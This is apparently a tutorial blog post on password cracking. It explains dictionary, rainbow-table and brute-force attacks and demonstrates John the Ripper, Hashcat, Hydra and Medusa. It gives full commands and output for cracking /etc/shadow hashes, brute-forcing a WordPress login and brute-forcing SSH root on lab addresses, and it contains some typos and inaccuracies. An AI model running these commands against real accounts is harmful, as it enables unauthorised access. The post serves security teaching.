Table of Contents
- Types of attacks
- Password Cracking Strategy
- Other Password Cracking Tools
Passwords are the most widely used form of authentication throughout the world. A username and password are used for logging in your social media accounts, banks, etc.
Password cracking is the process of recovering passwords from data that have been stored in or transmitted by a computer system. A common approach is to try guesses for the password and check them against an available cryptpgraphic has of the password. This process is often called as the brute-force attack.
In general, passwords are not stored in clear text. In fact, passwords are stored as hashes. Hashes or hash values are the values returned by a function, called as the hash-function, which is used to map data of arbiitrary size to data of fixed size.
Types of attacks
A dictionary attack is the simplest and fastest password cracking attack. The implementation of the attack simply runs through a dictionary of words trying each one of them to see if they work. This attack is possible because the computers now-a-days have performance capabilities. This is usually the first approaching for password cracking.
Rainbow Table Attacks
Mostly, passwords are not stored in plaintext. They are mostly stored in the form of a hash. Hence, even if the attacker dumps the passwords, all he gets is the hash value of the password, which cannot be used to authenticate. One way to crack this encryption is to take the dictionary file, hash each word and compare it to the hashed password. But this is very time consuming. A faster approach would be to take a table with all the words in the dictionary already hashed, and compare this hash with the found password hash. This type of attack is called Rainbow Table Attack.
This type of attack is the most type consuming approach. This should be your last resort to crack the password. Brute-force attack techniques tries to attempt all the possibilities of all the letters, numbers and special characters that can be combined to generate a password. Hence, this technique requires a lot of computing power.
Password Cracking Strategy
Expert password crackers have a strategy. They don’t expect to be able to crack every password, but with a well-developed strategy, they can crack most passwords in a very short amount of time.
John The Ripper is one of the well-known password cracking tool. It is a command line tool for Linux only. That’s why it is a faster cracking tool. One of the beauties of this tool is its built in default password cracking strategy.
First, it attempts a dictionary attack and if that fails, it then attempts to use combined dictionary words, then tries a hybrid attack of dictionary words with special characters and numbers and only if all those fail will it resort to a brute-force.
[email protected]:~# unshadow passwd shadow > unshadowed.txt [email protected]:~# john --wordlist=/usr/share/john/password.lst --rules unshadowed.txt Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt" option to force loading these as that type instead Loaded 1 password hash (sha512crypt [64/64]) toor (root) guesses: 1 time: 0:00:00:07 DONE (Mon May 19 08:13:05 2014) c/s: 482 trying: 1701d - andrew Use the "--show" option to display all of the cracked passwords reliably
Hashcat is supposed to be the fastest password recovery tool. Examples of hashcat-supported hashing algorithms are Microsoft LM hashes, MD4, MD5, SHA-family, Unix Crypt formats, MySQL, and Cisco PIX.
Core attack types
Trying all words in a list; also called straight mode (attack mode 0, -a 0)
Concatenating words from multiple wordlists (mode 1)
- Brute-force Attack and Mask Attack Trying all characters from given charsets, per position (mode 3)
- Hybrid Attack
Combining wordlists+masks (mode 6) and masks+wordlists(mode 7)
Generic hash types
To crack the password
- Grab the hashes
One way to get the hashes is to use the hash from the /etc/shadow file.
The type of hashing used is the SHA512 algorithm.
- Choose your wordlist
There are many wordlists available. To find the wordlists available, type the command
[email protected]:/# locate wordlist
- Crack the hashes
Now that we know the type of encryption, we are ready to crack the hash. Let’s first put the hashes into a file which can be used for further cracking. Let’s put it into file named hash.lst.
To prepare this file for cracking, we need to remove all of the information in this file, except the hashes. The /etc/shadow file includes the username, then the salted hash, and then information about the applicable user policy. We need to remove all that information leaving just the hash.
We can see that this file starts with the username, i.e., “user1”, “user2”, etc. Open this file in your favorite text editor and delete the username and the following colon. Then, go to the end of the line and remove the information after the hash that starts with a colon (:). Now we will have a file with just the hashes and nothing else.
The final step is to crack the hash. This is the command used to crack the above hash:
kali > hashcat -m 1800 -a 0 -o plaintext.txt --remove hash.lst /usr/share/sqlmap/txt/wordlist.txt
||Type of hash (SHA-512)|
||Output file for the cracked passwords|
||Remove the hash after it has been cracked|
||Input file of hashes|
||Path to the wordlist for the attack|
Now, open the plaintext.txt file to view our cracked passwords!
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.
Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
The following snippet shows how to bruteforce ftp login, with username admin and a password wordlist password.lst
Check the line [ftp].
It mentions the username/password combination that worked for the ftp server. Quite easy!
Let’s see how we can use Hydra to brute-force HTTP form using POST request.
[email protected]:~# hydra -l elliot -P fsocity.dic.uniq 10.10.10.129 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' -t 64 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 13:11:57 [DATA] max 64 tasks per 1 server, overall 64 tasks, 11452 login tries (l:1/p:0), ~11452 tries per task [DATA] attacking http-post-form://10.10.10.129:80//wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect [STATUS] 2084.00 tries/min, 2084 tries in 00:00h, 0 to do in 01:00h, 9368 active [http-post-form] host: 10.10.10.129 login: elliot password: ER28-0652 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 64 targets did not complete Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 13:13:57
'/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' consists of POST parameters passed to the form.
The keywords ^USER^ and ^PASS^ is used to decide which parameters will consist username and password.
Some of the flags used for Hydra:
||Number of parallel Threads|
||Provide Wordlist for Username|
||Provide Wordlist for Password|
||To use HTTP POST request|
||To use HTTPS POST request|
||A string containing failure message|
Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:
- Thread-based parallel testing
- Flexible user input
- Modular design
- Multiple protocols supported (SMB, HTTP, POP3, MS-SQL, SSHv2)
AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form
Some of the flags used:
||Target hostname or IP address|
||Read target usernames from a wordlist file|
||Read target passwords from a wordlist file|
||Write the log into a file|
||Module to execute (without .mod extension)|
||Use for non-default TCP port number|
||Number of threads for concurrent login|
||Set verbose level (0 - 6). Default is 5|
Example of medusa to brute-force SSH login
# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete) ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete) << --- SNIP --->>> ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete) ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete) ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]
Other Password Cracking Tools
There are many more password cracking tools available. Every tools has it’s Pros and Cons. Some of the other tools available are: